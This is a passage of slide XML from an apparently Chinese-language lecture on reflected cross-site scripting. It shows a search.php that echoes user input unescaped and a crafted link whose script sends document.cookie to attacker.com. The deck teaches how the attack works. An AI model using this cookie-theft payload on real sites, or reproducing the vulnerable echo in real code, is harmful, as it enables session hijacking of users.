          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12309" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2880663" y="2749520"/>
            <a:ext cx="2236510" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>发送有价值的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12310" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="3048000"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12311" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="4006850"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</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dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有漏洞的站点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的搜索字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器端实现的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;    &lt;TITLE&gt; Search Results &lt;/TITLE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> echo $_GET[term] ?&gt; :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;   &lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4495801"/>
            <a:ext cx="5280154" cy="1690663"/>
            <a:chOff x="3505200" y="4495800"/>
            <a:chExt cx="5447395" cy="1690128"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13317" name="Rounded Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="4495800"/>
              <a:ext cx="4419600" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13318" name="Freeform 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5580993" y="5155324"/>
              <a:ext cx="1387366" cy="614855"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T1" fmla="*/ 614855 h 614855"/>
                <a:gd name="T2" fmla="*/ 504497 w 1387366"/>
                <a:gd name="T3" fmla="*/ 409904 h 614855"/>
                <a:gd name="T4" fmla="*/ 0 w 1387366"/>
                <a:gd name="T5" fmla="*/ 0 h 614855"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1387366"/>
                <a:gd name="T10" fmla="*/ 0 h 614855"/>
                <a:gd name="T11" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T12" fmla="*/ 614855 h 614855"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="1387366" h="614855">
                  <a:moveTo>
                    <a:pt x="1387366" y="614855"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061545" y="563617"/>
                    <a:pt x="735725" y="512380"/>
                    <a:pt x="504497" y="409904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273269" y="307428"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13319" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6156391" y="5785945"/>
              <a:ext cx="2796204" cy="399983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>响应中包含搜索的内容</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>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Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="1676400"/>
            <a:ext cx="7848600" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFFF"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="76200"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1143000"/>
            <a:ext cx="2590800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1295363" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1219200"/>
            <a:ext cx="8305800" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>考虑下面这个链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com?cookie = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> )  &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>如果用户点击了这个链接会如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Results for &lt;script&gt; … &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>浏览器执行脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>badguy.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B9C6043-B639-4C00-98BD-A0B5BB8A8D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909888" y="2575800"/>
            <a:ext cx="3567112" cy="396000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EFDFD3-150F-4BCC-95DF-2B056AFB30B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7265276" y="4705290"/>
            <a:ext cx="1600200" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data or code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
